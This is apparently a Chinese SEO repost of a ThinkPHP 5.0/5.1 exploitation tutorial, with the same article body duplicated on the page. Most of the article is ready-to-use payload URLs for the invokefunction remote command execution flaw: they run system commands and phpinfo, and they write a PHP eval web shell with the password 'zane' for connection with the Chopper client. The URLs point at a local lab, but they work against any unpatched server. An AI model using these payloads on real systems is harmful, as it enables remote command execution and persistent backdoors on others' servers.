ThinkPHP中存在哪些已知漏洞及其具体利用方法?

2026-04-18 08:382阅读0评论SEO教程
  • 内容介绍
  • 文章标签
  • 相关推荐

本文共计404个文字,预计阅读时间需要2分钟。

ThinkPHP中存在哪些已知漏洞及其具体利用方法?

下面是对原文的简化

想了解ThinkPHP框架?这里为您介绍ThinkPHP,涵盖漏洞利用,希望对需要帮助的朋友有所帮助!ThinkPHP 5x 命令执行漏洞+受影响版本:5.0及5.1Docker漏洞环境源码:[链接](https://github.com/vulnspy/thin)

下面由thinkphp框架教程栏目给大家介绍ThinkPHP 漏洞利用,希望对需要的朋友有所帮助!

thinkphp_5x_命令执行漏洞

受影响版本包括5.0和5.1版本

docker漏洞环境源码:
github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15+php5.6n+ apache2.0
www.thinkphp.cn/donate/download/id/1125.html

利用system函数远程命令执行

EXP
127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

通过phpinfo函数写出phpinfo()信息

EXP:
127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

写入shell

127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php 或者 127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>

使用菜刀连接
`
127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密码为zane

127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密码为zane
`

以上就是关于ThinkPHP漏洞利用的详细内容,更多请关注自由互联其它相关文章!

ThinkPHP中存在哪些已知漏洞及其具体利用方法?

标签:关于ThinkPHP漏洞利用下面

相关推荐

102945如何通过速查排名秘籍打造长尾关键词,提升网站搜索引擎排名?102948如何通过长尾关键词优化提升百度推广效果?102957ThinkPHP5.1版本如何正确引入composer vendor扩展包?102970上海SEO优化专家服务哪家好?102972ThinkPHP框架的审计有哪些关键点需要注意?102975如何快速掌握fastadmin入门必备教程,高效提升开发技能?102982如何将ThinkPHP6后台与Google登录验证功能相结合实现用户认证?102986如何通过搜狗SEO实现高效网站优化?102993如何修改Yii1验证码显示问题?102994怀化SEO开发专家是哪家公司?103003有没有推荐一个好用的ThinkPHP Repository包,能高效管理项目依赖?103009全网搜索宝库中,有哪些冷门但实用的长尾关键词?103015如何解决yii2 console控制台乱码显示问题?103016如何通过Redis实现高效的Think-Queue长尾任务队列管理?103031如何快速将小店区SEO提升为行业专家?103035如何将Yii2打印SQL语句的功能改写成长尾?

本文共计404个文字,预计阅读时间需要2分钟。

ThinkPHP中存在哪些已知漏洞及其具体利用方法?

下面是对原文的简化

想了解ThinkPHP框架?这里为您介绍ThinkPHP,涵盖漏洞利用,希望对需要帮助的朋友有所帮助!ThinkPHP 5x 命令执行漏洞+受影响版本:5.0及5.1Docker漏洞环境源码:[链接](https://github.com/vulnspy/thin)

下面由thinkphp框架教程栏目给大家介绍ThinkPHP 漏洞利用,希望对需要的朋友有所帮助!

thinkphp_5x_命令执行漏洞

受影响版本包括5.0和5.1版本

docker漏洞环境源码:
github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15+php5.6n+ apache2.0
www.thinkphp.cn/donate/download/id/1125.html

利用system函数远程命令执行

EXP
127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

通过phpinfo函数写出phpinfo()信息

EXP:
127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

写入shell

127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php 或者 127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>

使用菜刀连接
`
127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密码为zane

127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密码为zane
`

以上就是关于ThinkPHP漏洞利用的详细内容,更多请关注自由互联其它相关文章!

ThinkPHP中存在哪些已知漏洞及其具体利用方法?